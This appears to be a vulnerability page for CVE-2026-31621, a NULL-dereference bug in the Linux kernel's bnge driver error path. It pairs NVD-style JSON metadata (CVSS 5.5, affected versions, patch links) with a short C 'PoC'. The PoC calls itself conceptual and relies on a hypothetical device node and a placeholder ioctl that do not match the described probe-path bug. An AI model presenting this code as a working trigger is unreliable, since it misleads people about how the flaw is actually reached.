CVE-2026-31621

/* * PoC for CVE-2026-31621 * Conceptual trigger for bnge driver initialization failure. * Requires a system with the bnxe/bnge driver and specific hardware or emulation. */ #include <stdio.h> #include <stdlib.h> #include <fcntl.h> #include <unistd.h> #include <sys/ioctl.h> // This is a conceptual representation. // In a real scenario, one might interact with the device node or sysfs // to trigger the probe/init path where auxiliary_device_add fails. int main() { printf("Attempting to trigger CVE-2026-31621...\n"); // Attempt to load or interact with the vulnerable module // This often requires specific hardware or forcing a load failure. // For demonstration, we assume the attacker can trigger the init path. int fd = open("/dev/bnge_control", O_RDWR); // Hypothetical device node if (fd < 0) { perror("Failed to open device"); return 1; } // Ioctl or operation that triggers the probe/init sequence // where auxiliary_device_add might fail (e.g., ENOMEM) if (ioctl(fd, 0x1337, NULL) < 0) { // If the logic bug exists, the kernel might crash here // due to the missing return after uninit. perror("Ioctl failed"); } close(fd); printf("If vulnerable, the kernel may panic/crash.\n"); return 0; }

{"cve": {"id": "CVE-2026-31621", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-04-24T15:16:41.380", "lastModified": "2026-04-28T14:05:14.443", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbnge: return after auxiliary_device_uninit() in error path\n\nWhen auxiliary_device_add() fails, the error block calls\nauxiliary_device_uninit() but does not return. The uninit drops the\nlast reference and synchronously runs bnge_aux_dev_release(), which sets\nbd->auxr_dev = NULL and frees the underlying object. The subsequent\nbd->auxr_dev->net = bd->netdev then dereferences NULL, which is not a\ngood thing to have happen when trying to clean up from an error.\n\nAdd the missing return, as the auxiliary bus documentation states is a\nrequirement (seems that LLM tools read documentation better than humans\ndo...)"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-908"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.14", "matchCriteriaId": "D6A8A074-BBF4-4803-ABED-519A839435BB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0", "versionEndExcluding": "7.0.1", "matchCriteriaId": "9B5888AB-7403-4335-89E4-21CC0B48366A"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/38c383ec6d37f4b5597f8e6a1f5c2ab31ea01d3a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/87bc3557c708110d83086bf091328271298a44e3", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/8b0c25528cb64f71a73b5c0d49cbbcb68540a4ce", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}